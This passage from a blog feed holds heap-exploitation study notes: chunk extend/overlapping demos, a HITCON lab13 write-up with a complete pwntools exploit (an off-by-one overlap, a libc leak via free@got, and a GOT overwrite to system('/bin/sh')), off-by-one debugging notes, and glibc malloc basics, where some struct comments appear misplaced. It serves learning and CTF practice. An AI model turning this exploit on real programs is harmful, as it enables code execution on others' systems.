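    *(<span class="hljs-type">long</span> <span class="hljs-type">long</span> *)((<span class="hljs-type">long</span> <span class="hljs-type">long</span>)ptr<span class="hljs-number">-0x8</span>)=<span class="hljs-number">0x61</span>;
    <span 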
class="hljs-built_in">free</span>(ptr);
    ptr1=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x50</span>);
}</code></pre></div><p>After the four initial allocations:</p><p><img src="/images/chunk_extend_overlapping/7.png" alt></p><p>Change the first chunk's size to 0x61 and then free it. Everything inside the red box is treated as a single chunk and placed into the fastbin:</p><p><img src="/images/chunk_extend_overlapping/8.png" alt></p><p><img src="/images/chunk_extend_overlapping/9.png" alt></p><p>A later allocation of 0x50 bytes (not counting the chunk header) is then served from this memory:</p><p><img src="/images/chunk_extend_overlapping/10.png" alt></p><p>Once malloc(0x50) has reclaimed the extended region, the 0x10 fastbin chunks inside it can still be allocated and freed normally. The chunks now overlap, and operating on the overlapping region makes a fastbin attack possible.</p><h3 id="基本示例-5:通过-extend-前向-overlapping">Basic example 5: forward overlapping via extend</h3><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span>
<span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span>
<span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">void</span>)</span>
{
    <span class="hljs-type">void</span> *ptr1,*ptr2,*ptr3,*ptr4;
    ptr1=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">128</span>);<span class="hljs-comment">//smallbin1</span>
    ptr2=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">//fastbin1</span>
    ptr3=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">//fastbin2</span>
    ptr4=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">128</span>);<span class="hljs-comment">//smallbin2</span>
    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">// guard chunk: prevents merging with the top chunk</span>
    <span class="hljs-built_in">free</span>(ptr1);
    *(<span class="hljs-type">int</span> *)((<span class="hljs-type">long</span> <span class="hljs-type">long</span>)ptr4<span class="hljs-number">-0x8</span>)=<span 
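class="hljs-number">0x90</span>;<span class="hljs-comment">// clear the prev_inuse bit in ptr4's size field (0x91 -> 0x90)</span>
    *(<span class="hljs-type">int</span> *)((<span class="hljs-type">long</span> <span class="hljs-type">long</span>)ptr4<span class="hljs-number">-0x10</span>)=<span class="hljs-number">0xd0</span>;<span class="hljs-comment">// set ptr4's prev_size to 0x90 + 0x20 + 0x20 = 0xd0</span>
    <span class="hljs-built_in">free</span>(ptr4);<span class="hljs-comment">// unlink performs the forward extend</span>
    <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x150</span>);<span class="hljs-comment">// placeholder allocation that takes the merged chunk</span>
}</code></pre></div><p>I could not get heap information out of the debugger for this example, so here is a description in words:</p><p>First lay out the five chunks, then free ptr1 so that it goes into the unsorted bin. Clear the prev_inuse bit of ptr4's chunk to mark the previous chunk as free, and set ptr4's prev_size to the combined size of the ptr1, ptr2 and ptr3 chunks. Freeing ptr4 then triggers the reclaim logic, which merges physically adjacent free chunks using unlink, and the chunks of ptr1 through ptr4 are placed into the unsorted bin as a single chunk.</p><p>Forward extend relies on the unlink mechanism of smallbin chunks: by modifying the prev_size field, the merge can span several chunks and produce an overlap.</p><h2 id="例题">Example challenge</h2><h3 id="hitcon-training-lab13">HITCON Training lab13</h3><p><a href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/linux/user-mode/heap/chunk-extend-shrink/hitcontraning_lab13">Challenge link</a></p><h4 id="基本信息">Basic information</h4><div class="code-wrapper"><pre><code class="hljs bahs"># zer0ptr @ DESKTOP-FHEMUHT in ~/Pwn-Research/Heap-overflow-basic/Chunk_extend_overlapping/HITCON_Training_lab13 [15:58:02]
$ checksec heapcreator
[*] '/home/zer0ptr/Pwn-Research/Heap-overflow-basic/Chunk_extend_overlapping/HITCON_Training_lab13/heapcreator'
    Arch: amd64-64-little
    RELRO: Partial RELRO
    Stack: Canary found
    NX: NX enabled
    PIE: No PIE (0x400000)
    Stripped: No</code></pre></div><p>The program is a 64-bit dynamically linked binary with stack canary and NX enabled. RELRO is only partial and PIE is off, so GOT entries sit at fixed addresses and remain writable.</p><h4 id="基本功能">Basic functionality</h4><p>The program is roughly a custom heap manager. Each heap entry has two members: a size and a content pointer. Its main functions are:</p><ol><li>Create heap: allocates memory according to the length the user enters and uses read to read that many bytes of content. The length is not validated, so a negative length would cause an arbitrary-length heap overflow, provided the malloc succeeds. The content is also not NUL-terminated after the read.</li><li>Edit heap: reads new content for the given index using the stored size, but reads one byte more than that size, so <strong>there is an off-by-one vulnerability</strong>.</li><li>Show heap: prints the size and content of the heap at the given index.</li><li>Delete heap: frees the given heap and sets the corresponding pointer to NULL.</li></ol><h4 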
id="利用">Exploitation</h4><p>The basic exploitation idea is:</p><ol><li>Use the off-by-one bug to overwrite the size field of the next chunk, forging a larger chunk size.</li><li>After freeing that chunk, request a chunk of the forged size to produce a chunk overlap, then modify key pointers through it.</li></ol><div class="code-wrapper"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/env python</span>
<span class="hljs-comment"># -*- coding: utf-8 -*-</span>
<span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *

context.log_level = <span class="hljs-string">'debug'</span>
p = process(<span class="hljs-string">"./heapcreator"</span>)
elf = ELF(<span class="hljs-string">"./heapcreator"</span>)
libc = ELF(<span class="hljs-string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)

<span class="hljs-keyword">def</span> <span class="hljs-title function_">create</span>(<span class="hljs-params">size, content</span>):
    p.recvuntil(<span class="hljs-string">b"choice :"</span>)
    p.sendline(<span class="hljs-string">b"1"</span>)
    p.recvuntil(<span class="hljs-string">b"Heap : "</span>)
    p.sendline(<span class="hljs-built_in">str</span>(size).encode())
    p.recvuntil(<span class="hljs-string">b"heap:"</span>)
    p.send(content)

<span class="hljs-keyword">def</span> <span class="hljs-title function_">edit</span>(<span class="hljs-params">idx, content</span>):
    p.recvuntil(<span class="hljs-string">b"choice :"</span>)
    p.sendline(<span class="hljs-string">b"2"</span>)
    p.recvuntil(<span class="hljs-string">b"Index :"</span>)
    p.sendline(<span class="hljs-built_in">str</span>(idx).encode())
    p.recvuntil(<span class="hljs-string">b"heap :"</span>)
    p.send(content)

<span class="hljs-keyword">def</span> <span class="hljs-title function_">show</span>(<span class="hljs-params">idx</span>):
    p.recvuntil(<span class="hljs-string">b"choice :"</span>)
    p.sendline(<span class="hljs-string">b"3"</span>)
    p.recvuntil(<span class="hljs-string">b"Index :"</span>)
    p.sendline(<span class="hljs-built_in">str</span>(idx).encode())

<span class="hljs-keyword">def</span> <span class="hljs-title function_">free</span>(<span 
class="hljs-params">idx</span>):
    p.recvuntil(<span class="hljs-string">b"choice :"</span>)
    p.sendline(<span class="hljs-string">b"4"</span>)
    p.recvuntil(<span class="hljs-string">b"Index :"</span>)
    p.sendline(<span class="hljs-built_in">str</span>(idx).encode())

<span class="hljs-keyword">def</span> <span class="hljs-title function_">exit</span>():
    p.recvuntil(<span class="hljs-string">b"choice :"</span>)
    p.sendline(<span class="hljs-string">b"5"</span>)

<span class="hljs-comment"># off-by-one</span>
create(<span class="hljs-number">0x18</span>, <span class="hljs-string">b'a'</span>*<span class="hljs-number">0x10</span>) <span class="hljs-comment"># 0</span>
create(<span class="hljs-number">0x10</span>, <span class="hljs-string">b'b'</span>*<span class="hljs-number">0x10</span>) <span class="hljs-comment"># 1</span>
<span class="hljs-comment"># the one extra byte (0x41) overwrites the size field of the chunk that follows heap 0's content</span>
edit(<span class="hljs-number">0</span>, <span class="hljs-string">b"/bin/sh\x00"</span>.ljust(<span class="hljs-number">0x18</span>, <span class="hljs-string">b'a'</span>) + <span class="hljs-string">b"\x41"</span>)
free(<span class="hljs-number">1</span>)

<span class="hljs-comment"># leak libc</span>
free_got = elf.got[<span class="hljs-string">'free'</span>]
<span class="hljs-comment"># the 0x30 content overlaps heap 1's new struct: size = 0x30, content pointer = free@got</span>
create(<span class="hljs-number">0x30</span>, <span class="hljs-string">b'a'</span>*<span class="hljs-number">0x18</span> + p64(<span class="hljs-number">0x21</span>) + p64(<span class="hljs-number">0x30</span>) + p64(free_got))
show(<span class="hljs-number">1</span>)
p.recvuntil(<span class="hljs-string">b"Content : "</span>)
free_addr = u64(p.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b'\x00'</span>))
log.info(<span class="hljs-string">"free_addr:"</span> + <span class="hljs-built_in">hex</span>(free_addr))
libc_base = free_addr - libc.symbols[<span class="hljs-string">'free'</span>]
log.info(<span class="hljs-string">"libc_base:"</span> + <span class="hljs-built_in">hex</span>(libc_base))
system = libc_base + libc.symbols[<span 
class="hljs-string">'system'</span>]
log.info(<span class="hljs-string">"system:"</span> + <span class="hljs-built_in">hex</span>(system))
<span class="hljs-comment"># heap 1's content pointer is free@got, so this overwrites free@got with system</span>
edit(<span class="hljs-number">1</span>, p64(system))
<span class="hljs-comment"># gdb.attach(p)</span>
<span class="hljs-comment"># heap 0's content starts with "/bin/sh", so freeing it now calls system("/bin/sh")</span>
free(<span class="hljs-number">0</span>)
p.interactive()</code></pre></div><h2 id="references">References</h2><ul><li><p>CTF-Wiki</p><ul><li><a href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/chunk-extend-overlapping/#5extendoverlapping">Chunk Extend and Overlapping</a></li></ul></li><li><p>CSDN</p><ul><li><a href="https://blog.csdn.net/qq_41202237/article/details/108320408">好好说话之Chunk Extend/Overlapping</a></li><li><a href="https://blog.csdn.net/weixin_43921239/article/details/107841328">Chunk Extend/Overlapping | 堆拓展、重叠</a></li><li><a href="https://blog.csdn.net/weixin_45677731/article/details/107914807">buuctf hitcontraining_heapcreator HITCON Trainging lab13</a></li></ul></li><li><p>知乎</p><ul><li><a href="https://zhuanlan.zhihu.com/p/61691650">堆利用之 chunk overlapping</a></li></ul></li><li><p>博客园</p><ul><li><a href="https://www.cnblogs.com/WangAoBo/p/hitconTraining_wp.html#_label12">M4x@10.0.0.55</a></li><li><a href="https://www.cnblogs.com/Pocon/articles/19529104">PWN-extend overlapping</a></li></ul></li><li><p>Blogs</p><ul><li><a href="https://yun1ian.github.io/2024/10/28/Overlapping/">hunk Extend and Overlapping(堆重叠)</a></li><li><a href="https://pidanxu.github.io/2019/02/27/hitcon-training-lab13/index.html">hitcon training lab13</a></li><li><a href="https://zh-closure.github.io/2022/03/03/Extend-and-Overlapping/#2%E3%80%81%E5%AF%B9inuse%E7%9A%84smallbin%E8%BF%9B%E8%A1%8Cextend">chunk extend overlapping</a></li></ul></li><li><p>看雪</p><ul><li><a href="https://bbs.kanxue.com/thread-247110-1.htm">HITCON Trainging lab13 heapcreator</a></li></ul></li></ul>]]></content>
<categories>
<category> Pwn </category>
</categories>
<tags>
<tag> 堆溢出 </tag>
<tag> Heap </tag>
<tag> Chunk Extend and Overlapping </tag>
</tags>
</entry>
<entry>
<title>Off-by-One Study Notes</title>
<link href="/2026/02/07/offbyone/"/>
<url>/2026/02/07/offbyone/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h3 id="description">Description</h3><blockquote><p>An off-by-one vulnerability is a special kind of buffer overflow: it <strong>overflows by exactly one byte</strong>, and that byte is not necessarily attacker-controlled. It usually arises in one of two situations:</p><ol><li>A loop boundary is set incorrectly (for example, writing "<strong><=</strong>" where "<strong><</strong>" was intended);</li><li>String-handling functions are misused (different functions treat the trailing "<strong>\0</strong>" differently, so mixing them can push the trailing "<strong>\0</strong>" past the end of the buffer).</li></ol></blockquote><h3 id="循环边界设置不当">Incorrect loop boundary</h3><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">char</span> a[<span class="hljs-number">16</span>];<span class="hljs-keyword">for</span>(<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>;i<=<span class="hljs-number">16</span>;i++){ read(<span class="hljs-number">0</span>,a+i,<span class="hljs-number">1</span>);}</code></pre></div><p>The loop above actually runs 17 times, so it writes one byte past the end of <code>a</code>. An attacker can build a variety of attacks on this single-byte overflow.</p><blockquote><p>This mistake is also known as a fencepost error.<br>Wikipedia: a fencepost error (sometimes called a telegraph pole or lamp-post error) is a kind of off-by-one error. Consider the following problem:</p><div class="code-wrapper"><pre><code class="hljs text">If you build a straight fence (not a closed loop) 30 meters long with posts spaced 3 meters apart, how many posts do you need?</code></pre></div><p>The obvious answer, 10, is wrong. The fence has 10 sections but 11 posts.</p></blockquote><p>I set breakpoints at <code>puts</code> (before my_gets) and at line 19 (return 0):</p><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> b putsBreakpoint 1 at 0x1070pwndbg> b 19Breakpoint 2 at 0x1214: file example.c, line 19.pwndbg> r_____________________________________________________________________pwndbg> rStarting program: /home/zer0ptr/Pwn-Research/Heap-overflow-basic/off_by_one_example/example/offbyone_1 [Thread debugging using libthread_db enabled]Using host libthread_db library <span class="hljs-string">"/lib/x86_64-linux-gnu/libthread_db.so.1"</span>.Breakpoint 1, __GI__IO_puts (str=0x555555556004 <span class="hljs-string">"Get Input:"</span>) at 
./libio/ioputs.c:3333 ./libio/ioputs.c: No such file or directory.LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA───────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────────────────────────────────────────── RAX 0x555555556004 ◂— <span class="hljs-string">'Get Input:'</span> RBX 0 RCX 0x21 RDX 0 RDI 0x555555556004 ◂— <span class="hljs-string">'Get Input:'</span> RSI 0x5555555592d0 ◂— 0 R8 0x21001 R9 0x5555555592c0 ◂— 0 R10 0xfffffffffffff000 R11 0x7ffff7e1ace0 (main_arena+96) —▸ 0x5555555592d0 ◂— 0 R12 0x7fffffffd718 —▸ 0x7fffffffda52 ◂— <span class="hljs-string">'/home/zer0ptr/Pwn-Research/Heap-overflow-basic/off_by_one_example/example/offbyone_1'</span> R13 0x5555555551cc (main) ◂— endbr64 R14 0x555555557db0 (__do_global_dtors_aux_fini_array_entry) —▸ 0x555555555140 (__do_global_dtors_aux) ◂— endbr64 R15 0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f RBP 0x7fffffffd600 ◂— 1 RSP 0x7fffffffd5e8 —▸ 0x555555555203 (main+55) ◂— mov rax, qword ptr [rbp - 0x10] RIP 0x7ffff7c80e50 (puts) ◂— endbr64 ────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / <span class="hljs-built_in">set</span> <span class="hljs-built_in">emulate</span> on ]───────────────────────────────────────────────────────────────────────────────────────────────────── ► 0x7ffff7c80e50 <puts> endbr64 0x7ffff7c80e54 <puts+4> push r14 0x7ffff7c80e56 <puts+6> push r13 0x7ffff7c80e58 <puts+8> push r12 0x7ffff7c80e5a <puts+10> mov r12, rdi R12 => 0x555555556004 ◂— <span class="hljs-string">'Get Input:'</span> 0x7ffff7c80e5d <puts+13> push rbp 0x7ffff7c80e5e <puts+14> push rbx 0x7ffff7c80e5f <puts+15> sub rsp, 0x10 RSP => 0x7fffffffd5b0 (0x7fffffffd5c0 - 0x10) 0x7ffff7c80e63 <puts+19> call *ABS*+0xa86a0@plt <*ABS*+0xa86a0@plt> 0x7ffff7c80e68 <puts+24> mov r13, qword 
ptr [rip + 0x198fc9] R13, [0x7ffff7e19e38] => 0x7ffff7e1b868 (stdout) 0x7ffff7c80e6f <puts+31> mov rbx, rax──────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7fffffffd5e8 —▸ 0x555555555203 (main+55) ◂— mov rax, qword ptr [rbp - 0x10]01:0008│-010 0x7fffffffd5f0 —▸ 0x5555555592a0 ◂— 002:0010│-008 0x7fffffffd5f8 —▸ 0x5555555592c0 ◂— 003:0018│ rbp 0x7fffffffd600 ◂— 104:0020│+008 0x7fffffffd608 —▸ 0x7ffff7c29d90 (__libc_start_call_main+128) ◂— mov edi, eax05:0028│+010 0x7fffffffd610 ◂— 006:0030│+018 0x7fffffffd618 —▸ 0x5555555551cc (main) ◂— endbr64 07:0038│+020 0x7fffffffd620 ◂— 0x1ffffd700────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────────────────────────────────────── ► 0 0x7ffff7c80e50 puts 1 0x555555555203 main+55 2 0x7ffff7c29d90 __libc_start_call_main+128 3 0x7ffff7c29e40 __libc_start_main+128 4 0x5555555550c5 _start+37</code></pre></div><p>Taking the two heap pointers from the stack dump above and inspecting them:</p><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> x/10gx 0x5555555592a00x5555555592a0: 0x0000000000000000 0x00000000000000000x5555555592b0: 0x0000000000000000 0x00000000000000210x5555555592c0: 0x0000000000000000 0x00000000000000000x5555555592d0: 0x0000000000000000 0x0000000000020d310x5555555592e0: 0x0000000000000000 0x0000000000000000pwndbg> x/10gx 0x5555555592c00x5555555592c0: 0x0000000000000000 0x00000000000000000x5555555592d0: 0x0000000000000000 0x0000000000020d310x5555555592e0: 0x0000000000000000 0x00000000000000000x5555555592f0: 0x0000000000000000 0x00000000000000000x555555559300: 0x0000000000000000 0x0000000000000000</code></pre></div><p>Two chunks with a 16-byte user area each have been allocated here.<br>After my_gets reads our input, the overflow is visible: the 17th byte, 0x61, lands at 0x5555555592b0 and overwrites the low byte of the next chunk's prev_size field, while that chunk's size field (0x21) is left intact.</p><div 
class="code-wrapper"><pre><code class="hljs bash">pwndbg> x/10gx 0x5555555592a00x5555555592a0: 0x6161616161616161 0x61616161616161610x5555555592b0: 0x0000000000000061 0x00000000000000210x5555555592c0: 0x0000000000000000 0x00000000000000000x5555555592d0: 0x0000000000000000 0x00000000000004110x5555555592e0: 0x75706e4920746547 0x00000000000a3a74</code></pre></div><h3 id="字符串结束符">String terminator</h3><p>The second common source of off-by-one bugs is string handling, usually because the string terminator was not counted correctly:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span> </span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><string.h></span> </span><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">void</span>)</span>{ <span class="hljs-type">char</span> buffer[<span class="hljs-number">40</span>]=<span class="hljs-string">""</span>; <span class="hljs-type">void</span> *chunk1; chunk1=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">24</span>); <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Get Input"</span>); gets(buffer); <span class="hljs-keyword">if</span>(<span class="hljs-built_in">strlen</span>(buffer)==<span class="hljs-number">24</span>) { <span class="hljs-built_in">strcpy</span>(chunk1,buffer); } <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;}<span class="hljs-comment">// gcc -g -o offbyone_2 offbyone_2.c -no-pie -fno-stack-protector -z execstack</span></code></pre></div><p>At first glance the program looks fine (ignoring the stack overflow), and many people write real code this way. However, strlen and strcpy behave differently, and that mismatch causes the off-by-one. strlen computes the length of an ASCII string without counting the terminating '\x00', whereas strcpy copies the terminating '\x00' as well. As a result 25 bytes are written into chunk1, which we can confirm in
gdb.<br>I set breakpoints at <code>*main+62</code> (the return address of the malloc call) and at <s><code>*main+141</code> (the return address once the program finishes)</s> <code>strcpy</code>:</p><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> disassemble mainDump of assembler code <span class="hljs-keyword">for</span> <span class="hljs-keyword">function</span> main: 0x00000000004011b6 <+0>: endbr64 0x00000000004011ba <+4>: push rbp 0x00000000004011bb <+5>: mov rbp,rsp 0x00000000004011be <+8>: sub rsp,0x30 0x00000000004011c2 <+12>: mov QWORD PTR [rbp-0x30],0x0 0x00000000004011ca <+20>: mov QWORD PTR [rbp-0x28],0x0 0x00000000004011d2 <+28>: mov QWORD PTR [rbp-0x20],0x0 0x00000000004011da <+36>: mov QWORD PTR [rbp-0x18],0x0 0x00000000004011e2 <+44>: mov QWORD PTR [rbp-0x10],0x0 0x00000000004011ea <+52>: mov edi,0x18 0x00000000004011ef <+57>: call 0x4010c0 <malloc@plt> 0x00000000004011f4 <+62>: mov QWORD PTR [rbp-0x8],rax 0x00000000004011f8 <+66>: lea rax,[rip+0xe05] <span class="hljs-comment"># 0x402004</span> 0x00000000004011ff <+73>: mov rdi,rax 0x0000000000401202 <+76>: call 0x401090 <puts@plt> 0x0000000000401207 <+81>: lea rax,[rbp-0x30] 0x000000000040120b <+85>: mov rdi,rax 0x000000000040120e <+88>: mov eax,0x0 0x0000000000401213 <+93>: call 0x4010b0 <gets@plt> 0x0000000000401218 <+98>: lea rax,[rbp-0x30] 0x000000000040121c <+102>: mov rdi,rax 0x000000000040121f <+105>: call 0x4010a0 <strlen@plt> 0x0000000000401224 <+110>: cmp rax,0x18 0x0000000000401228 <+114>: jne 0x40123d <main+135> 0x000000000040122a <+116>: lea rdx,[rbp-0x30] 0x000000000040122e <+120>: mov rax,QWORD PTR [rbp-0x8] 0x0000000000401232 <+124>: mov rsi,rdx 0x0000000000401235 <+127>: mov rdi,rax 0x0000000000401238 <+130>: call 0x401080 <strcpy@plt> 0x000000000040123d <+135>: mov eax,0x0 0x0000000000401242 <+140>: leave 0x0000000000401243 <+141>: ret End of assembler dump.pwndbg> b *main+62Breakpoint 2 at 0x4011f4: file offbyone_2.c, line 9.pwndbg> b strcpyBreakpoint 3 at 0x401243: file offbyone_2.c, line 
14.pwndbg></code></pre></div><p>After the malloc call, chunk1 looks like this:</p><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> x/10gx 0x4052a00x4052a0: 0x0000000000000000 0x00000000000000000x4052b0: 0x0000000000000000 0x0000000000020d510x4052c0: 0x0000000000000000 0x00000000000000000x4052d0: 0x0000000000000000 0x00000000000000000x4052e0: 0x0000000000000000 0x0000000000000000</code></pre></div><p>Then continue with c, enter b'a' * 24 as input, and inspect the chunk again:</p><div class="code-wrapper"><pre><code class="hljs bash">pwndbg> x/10gx 0x4052a00x4052a0: 0x6161616161616161 0x61616161616161610x4052b0: 0x6161616161616161 0x00000000000004000x4052c0: 0x75706e4920746547 0x0000000000000a740x4052d0: 0x0000000000000000 0x00000000000000000x4052e0: 0x0000000000000000 0x0000000000000000pwndbg></code></pre></div><p>The low byte of the next chunk's size field has been overwritten by the terminator <code>'\x00'</code>. This variant of off-by-one is called NULL byte off-by-one; the difference between exploiting off-by-one and NULL byte off-by-one is covered later. Why is it the low byte that gets overwritten? Because the CPUs we normally use are little-endian. For example, a DWORD value is stored in little-endian memory like this:</p><div class="code-wrapper"><pre><code class="hljs text">DWORD 0x41424344 in memory: 0x44,0x43,0x42,0x41</code></pre></div><h3 id="references">References</h3><ul><li>CTF-Wiki<ul><li><a href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/off-by-one/#off-by-one_1">堆中的 Off-By-One</a></li></ul></li><li>先知<ul><li><a href="https://xz.aliyun.com/news/12307">堆溢出 off by one & off by null</a></li><li><a href="https://xz.aliyun.com/news/16330">pwn的堆中如何使用off by one 和off by null的详细解析以及每一步的调试过程</a></li></ul></li><li>知乎<ul><li><a href="https://zhuanlan.zhihu.com/p/682436917">CTFer成长日记17:千里之堤,溃于蚁穴——off-by-one漏洞原理与利用1</a></li><li><a href="https://zhuanlan.zhihu.com/p/112364953">二进制安全之堆溢出(系列)—— off by one</a></li></ul></li><li>CSDN<ul><li><a href="https://blog.csdn.net/m0_57836225/article/details/143894507">PWN-Offbyone 漏洞解析</a></li></ul></li></ul>]]></content>
<categories>
<category> Pwn </category>
</categories>
<tags>
<tag> Heap </tag>
<tag> 堆 </tag>
</tags>
</entry>
<entry>
<title>Heap Basics: glibc_malloc_chunk, bin, threading, arena, system_call</title>
<link href="/2026/02/06/heap_glibc_malloc_chunk/"/>
<url>/2026/02/06/heap_glibc_malloc_chunk/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1>glibc_malloc_chunk</h1><h3 id="overview">Overview</h3><p>While a program runs, memory requested through malloc is called a chunk. Inside ptmalloc each chunk is represented by the malloc_chunk structure. When a chunk is freed, it is added to the matching free list. Regardless of size or state, every chunk uses the same data structure, malloc_chunk; only the way its fields are interpreted differs.</p><p>The malloc_chunk structure is defined as follows:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">/*</span><span class="hljs-comment"> This struct declaration is misleading (but accurate and necessary).</span><span class="hljs-comment"> It declares a "view" into memory allowing access to necessary</span><span class="hljs-comment"> fields at known offsets from a given base. See explanation below.</span><span class="hljs-comment">*/</span><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">malloc_chunk</span> {</span> INTERNAL_SIZE_T prev_size; <span class="hljs-comment">/* Size of previous chunk (if free). */</span> INTERNAL_SIZE_T size; <span class="hljs-comment">/* Size in bytes, including overhead. */</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">malloc_chunk</span>* <span class="hljs-title">fd</span>;</span> <span class="hljs-comment">/* double links -- used only if free. */</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">malloc_chunk</span>* <span class="hljs-title">bk</span>;</span> <span class="hljs-comment">/* Only used for large blocks: pointer to next larger size. */</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">malloc_chunk</span>* <span class="hljs-title">fd_nextsize</span>;</span> <span class="hljs-comment">/* double links -- used only if free. 
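*/</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">malloc_chunk</span>* <span class="hljs-title">bk_nextsize</span>;</span>};</code></pre></div><p>Depending on the chunk type, only some of the malloc_chunk fields are actually meaningful.</p><p>The heap segment contains the following chunk types:</p><ul><li>Allocated chunk;</li><li>Free chunk;</li><li>Top chunk;</li><li>Last Remainder chunk.</li></ul><h3 id="allocated-chunk">allocated chunk</h3><p>An allocated chunk is a chunk that has been handed to the user. Its layout is shown below:</p><p><img src="/images/heap_glibc_malloc_chunk/allocated_chunk.png" alt="images"></p><p>The three arrows on the left of the figure indicate, in order:</p><ul><li>chunk: the start address of the allocated chunk;</li><li>mem: the start address of the user-usable area of the allocated chunk;</li><li>next_chunk: the start address of the next chunk (whatever its type).</li></ul><p>The fields inside the structure have the following meaning:</p><blockquote><ul><li>prev_size: if the previous chunk is free, this field holds the size of the previous chunk; otherwise it is used to store user data of the previous chunk;</li><li>size: this field holds the size of this chunk, and its lowest three bits carry flags:<ul><li>PREV_INUSE (P): set to 1 when the previous chunk is allocated;</li><li>IS_MMAPPED (M): set to 1 when this chunk was obtained through mmap (for larger requests);</li><li>NON_MAIN_ARENA (N): set to 1 when this chunk belongs to a thread arena.</li></ul></li></ul><p>The remaining members of malloc_chunk, such as fd and bk, are not needed for an allocated chunk, so their space is used to store user data;<br>The size requested by the user is converted to an internal size, because extra space is needed for the malloc_chunk header and alignment must also be taken into account.</p></blockquote><h3 id="free-chunk">free chunk</h3><p>A free chunk is a chunk that the user has released with free.<br><img src="/images/heap_glibc_malloc_chunk/free_chunk.png" alt="free_chunk.png"></p><p>The fields inside the structure have the following meaning:</p><ul><li>prev_size: two adjacent free chunks are always merged into one, so this field always holds user data of the preceding allocated chunk;</li><li>size: this field holds the size of this free chunk;</li><li>fd: forward pointer, pointing to the next free chunk in the same bin (the forward link of the free list);</li><li>bk: backward pointer, pointing to the previous free chunk in the same bin (the backward link of the free list).</li></ul><h1>glibc_malloc_bin</h1><h2 id="bins">Bins</h2><h3 id="overview">Overview</h3><p>Chunks released by the user are not returned to the system immediately; ptmalloc manages the chunks in the heap and in mmap-mapped regions in a unified way. When the user requests memory again, the ptmalloc allocator tries to pick a suitable block from the free chunks according to its rules, which avoids frequent system calls and lowers the cost of allocation.<br>In the implementation, ptmalloc manages free chunks with a binning scheme. It first sorts free chunks by size and usage state into four classes: <code>fast bins</code>, <code>small bins</code>, <code>large 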
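bins</code>, <code>unsorted bin</code>. Each class is subdivided further, and chunks of similar size are linked together in a doubly linked list. In other words, each class of bin contains several independent lists that hold chunks of different sizes.</p><p>ptmalloc keeps the small bins, large bins and the unsorted bin in a single array. The corresponding data structure lives in malloc_state:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">define</span> NBINS 128</span><span class="hljs-comment">/* Normal bins packed as described above */</span>mchunkptr bins[ NBINS * <span class="hljs-number">2</span> - <span class="hljs-number">2</span> ];</code></pre></div><blockquote><p>bins is mainly used to index the fd and bk of each bin.</p></blockquote><p>To simplify use in doubly linked lists, each bin header is treated as a malloc_chunk. This avoids special handling for header types. However, to save space and improve locality, only the fd/bk pointers of each bin are allocated, and repositioning tricks are then used to treat these pointers as fields of a malloc_chunk*.<br>Taking a 32-bit system as an example, the first 4 entries of bins mean the following:</p><table><thead><tr><th style="text-align:left">bin index</th><th style="text-align:left">Meaning</th></tr></thead><tbody><tr><td style="text-align:left">0</td><td style="text-align:left">fd of bin1 / prev_size of bin2</td></tr><tr><td 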